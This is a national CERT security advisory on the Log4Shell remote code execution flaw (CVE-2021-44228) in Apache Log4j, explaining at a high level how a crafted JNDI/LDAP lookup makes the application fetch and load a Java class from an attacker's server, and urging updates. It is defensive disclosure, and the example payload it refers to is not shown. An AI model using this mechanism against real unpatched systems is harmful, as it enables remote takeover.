Advisory No: TZCERT/SA/2021/12/14
Date of First Release: 14th December 2021
Software Affected: All versions of Log4j from 2.0-beta9 to 2.14.1
Apache Log4j between versions log4j 2.0 to 2.14.1 are vulnerable to unauthenticated arbitrary code execution. A remote attacker can exploit the vulnerability to run malicious code on the affected machine.
Log4j is an open-source logging software widely used to log information. Log4j is used by approximately 3 billion devices running Java, including web servers, mobile devices, and even smart devices such as fridges. The versions of the software are vulnerable to arbitrary code execution.
The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation component of the Lightweight Directory Access Protocol (LDAP) connector and can be triggered using an LDAP request. It allows an attacker to retrieve a payload from a remote server and execute it locally.
To exploit the vulnerability, an attacker sends a request that contains malicious payload to the application. The crafted payload looks like in the following request;
Upon receiving the attacker’s payload, the vulnerable Log4j will interpret the input contained in the payload as a JNDI resource and make a request to the attacker’s controlled server to retrieve the requested resource. The attacker can send back a remote Java class file, which will then be loaded by the vulnerable application.
This vulnerability is assigned a CVE-2021-44228 with a CVSS severity score of 10 out of 10.
Successful exploitation of this vulnerability may allow an attacker to take control of the affected systems.
Apache has issued updates to fix vulnerable versions of Log4j. Users and Administrators are encouraged to apply necessary updates.